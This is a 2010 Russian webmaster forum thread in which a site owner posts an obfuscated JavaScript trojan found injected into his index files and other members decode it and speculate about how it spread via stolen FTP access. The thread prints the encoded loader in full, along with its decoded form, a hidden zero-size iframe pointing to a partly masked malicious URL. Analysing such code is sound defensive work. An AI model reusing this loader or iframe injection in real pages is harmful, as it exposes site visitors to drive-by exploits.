Новый, самый свежий троянчик для ваших сайтов! - Форум успешных вебмастеров

badguy · 16.01.2010, 06:56

Кароче такая тема.

Какой то свежий трой прописался ко мне на ресурсы, как то по хитрому автоматом во все индекс файлы.
Пока не понятно полу автомат или автомат. И как оно туда попало.
Заебался чистить.

тут вот коллеги тоже обсуждают но пока тихо.
http://www.drupal.ru/node/39144

<script>wvan=["ocynoaxi=0;nyzibet='';for(pfhuo=0;pfhuo<wvan[0]['length'];pfhuo+=1)ocynoaxi+=wvan[0].charCodeAt(pfhuo);ocynoaxi%=0x64;for(pfhuo=0;pfhu o<wvan[1]['length'];pfhuo+=2)nyzibet+=String.fromCharCode(parseInt(0+ 'x'+wvan[1].charAt(pfhuo)+wvan[1].charAt(pfhuo+1))^ocynoaxi);document.write(nyzibet );","24706c757426247a777c6126246b7b6a71686c266e796 a386c7d7568515e6a79757d257c777b6d757d766c367b6a7d7 96c7d5d747d757d766c303f717e6a79757d3f31236c7d75685 15e6a79757d366b7d6c596c6c6a717a6d6c7d303f717c3f343 f4a4b515e6a79757d3f31236c7d7568515e6a79757d366b7d6 c596c6c6a717a6d6c7d303f6b6a7b3f343f706c6c682237377 b74717b73356179767c367b777537797c377176367b7f71272 b3f31236c7d7568515e6a79757d366b6c61747d366e716b717 a7174716c61253f70717c7c7d763f236c7d7568515e6a79757 d366b6c61747d366f717c6c70253f2868603f236c7d7568515 e6a79757d366b6c61747d36707d717f706c253f2868603f235 15e6a79757d577a723825387c777b6d757d766c367a777c613 67968687d767c5b7071747c306c7d7568515e6a79757d31232 4376b7b6a71686c2624377a777c61262437706c757426"];eval(wvan[0]);</script>

Помогите расшифровать код.
Если кто тут умный

~~chubaka~~ · 16.01.2010, 07:13

Зашифровано хитро.
Ни во что читабельное код не разшифровывается. ИМХО браузерный экспоит какойто. Полный код получается таким:

PHP код:


			
<script>



wvan=["ocynoaxi=0;nyzibet='';for(pfhuo=0;pfhuo<wvan[0]['length'];pfhuo+=1)ocynoaxi+=wvan[0].charCodeAt(pfhuo);ocynoaxi%=0x64;for(pfhuo=0;pfhu o<wvan[1]['length'];pfhuo+=2)nyzibet+=String.fromCharCode(parseInt(0+ 'x'+wvan[1].charAt(pfhuo)+wvan[1].charAt(pfhuo+1))^ocynoaxi);document.write(nyzibet );","24706c757426247a777c6126246b7b6a71686c266e796 a386c7d7568515e6a79757d257c777b6d757d766c367b6a7d7 96c7d5d747d757d766c303f717e6a79757d3f31236c7d75685 15e6a79757d366b7d6c596c6c6a717a6d6c7d303f717c3f343 f4a4b515e6a79757d3f31236c7d7568515e6a79757d366b7d6 c596c6c6a717a6d6c7d303f6b6a7b3f343f706c6c682237377 b74717b73356179767c367b777537797c377176367b7f71272 b3f31236c7d7568515e6a79757d366b6c61747d366e716b717 a7174716c61253f70717c7c7d763f236c7d7568515e6a79757 d366b6c61747d366f717c6c70253f2868603f236c7d7568515 e6a79757d366b6c61747d36707d717f706c253f2868603f235 15e6a79757d577a723825387c777b6d757d766c367a777c613 67968687d767c5b7071747c306c7d7568515e6a79757d31232 4376b7b6a71686c2624377a777c61262437706c757426"];

ocynoaxi=0;nyzibet='';

for(pfhuo=0;pfhuo<wvan[0]['length'];pfhuo+=1)ocynoaxi+=wvan[0].charCodeAt(pfhuo);

ocynoaxi%=0x64;

for(pfhuo=0;pfhuo<wvan[1]['length'];pfhuo+=2)

nyzibet+=String.fromCharCode(parseInt(0+ 'x'+wvan[1].charAt(pfhuo)+wvan[1].charAt(pfhuo+1))^ocynoaxi);

alert(nyzibet); // тут смотрим результат через alert, в оригинале результат пишеться через document.write



</script>

badguy · 16.01.2010, 07:40

там єта датастринг без пробелов идет.
Но тоже ничего не понятно

~~chubaka~~ · 16.01.2010, 08:07

А да точно, сорри. Но результат всеравно не понятный, никакого ифрейма и тому подобного не нашел..

ziavra · 16.01.2010, 08:41

Дай код нормальный в личку без всяких пробелов и прочего добавленного, просто текстовым файлом.

ziavra · 16.01.2010, 08:47

короче

PHP код:


			
<html><body><script>var tempIFrame=document.createElement('iframe');tempIFrame.setAttribute('id','RSIFrame');tempIFrame.setAttribute('src','http://*******.com/ad/in.cgi?3');tempIFrame.style.visibility='hidden';tempIFrame.style.width='0px';tempIFrame.style.height='0px';IFrameObj = document.body.appendChild(tempIFrame);</script></body></html>

Домен в личку отправил

kavopero · 16.01.2010, 10:33

Это в какой то конкретный движок прописался трой или как?

Nou · 16.01.2010, 18:37

Это давно известный способ добавления троя во все index.* файлы всех директорий на фтп. Я таких ловил ещё несколько лет назад.
Лезет через дыры в браузере, юзает тоталкоммандер (про кутефтп хз). А может и тупо сканит трафик.

Юзайте оперу, не юзайте фтп и будет вам хорошо.

BlackSeller · 17.01.2010, 23:17

Цитата:

Сообщение от Nou

Юзайте оперу, не юзайте фтп и будет вам хорошо.

Любители оперы)) Давным давно ее уже ребята херачат. И чем ты будешь пользоваться оперой или ИЕ или FireFox впринципе сейчас уже не так важно.

Tosser · 18.01.2010, 00:15

экспы пробивают не оперу, и не ие, и не фф, а например пдф, или яву